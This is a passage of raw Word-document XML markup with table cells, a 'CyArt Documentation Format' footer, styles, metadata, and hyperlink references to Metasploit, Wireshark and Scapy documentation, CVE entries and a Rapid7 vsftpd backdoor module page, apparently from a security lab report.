                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">t4_ip_traffic_chart.png</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="EAFAF1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1E8449"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Embedded (Fig 5)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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tabs>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:spacing w:before="80"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="555555"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">CyArt Documentation Format</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="000000"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserv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80"/>
    </w:pPr>
    <w:r>
      <w:drawing>
        <wp:inline distT="0" distB="0" distL="0" distR="0">
          <wp:extent cx="5715000" cy="723900"/>
          <wp:effectExtent t="0" r="0" b="0" l="0"/>
          <wp:docPr id="1" name="logo" descr="logo" title="Cy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715000" cy="723900"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                </pic:spPr>
              </pic:pic>
            </a:graphicData>
          </a:graphic>
        </wp:inline>
      </w:drawing>
    </w:r>
  </w:p>
  <w:p>
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:color="AAAAAA" w:sz="4"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color w:val="000000"/>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000000"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="Heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="180" w:after="8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q-xay18ghztaxycfgftxn" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.metasploit.com/" TargetMode="External"/><Relationship Id="rIdy9vplrerd1w7jgi9vnabs" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.metasploit.com/" TargetMode="External"/><Relationship Id="rIdk_niwmyv4dsd1lyon1lfz" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.wireshark.org/docs/" TargetMode="External"/><Relationship Id="rIdrkfvisz68x4h6_oitqqmj" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://scapy.readthedocs.io/" TargetMode="External"/><Relationship Id="rIdzyloi97fwr27pqaehnayv" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.wireshark.org/TLS" TargetMode="External"/><Relationship Id="rIdoymeeydshn-erdo_7rexd" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cvedetails.com/cve/CVE-2011-2523/" TargetMode="External"/><Relationship Id="rId1emlagfjsvvceaeqnwpfp" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cvedetails.com/cve/CVE-2007-2447/" TargetMode="External"/><Relationship Id="rIdwnujlkmcmsktotntu1e3y" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor/" TargetMode="External"/><Relationship Id="rIdaogihysor6-3czdhntwdq" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://draw.io/" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/e864c2e249ce1b561992289902241d2debc73524.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/4afe3066d40b4819b7255e6f0379376d3dc541fa.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/bbf04a04d77b4c2f059f5010f10139dc8838d447.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/3b6519a9cf44e47b26678a7ebe7d78530733e132.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/d2971cd6023b1fc48073e450bc6c00ddfa8726fc.png"/><Relationship Id="rId2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ebb362662cbaa5d093e645ef2c043212b9c0aa.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2026-03-12T10:00:23.677Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-12T10:00:23.678Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>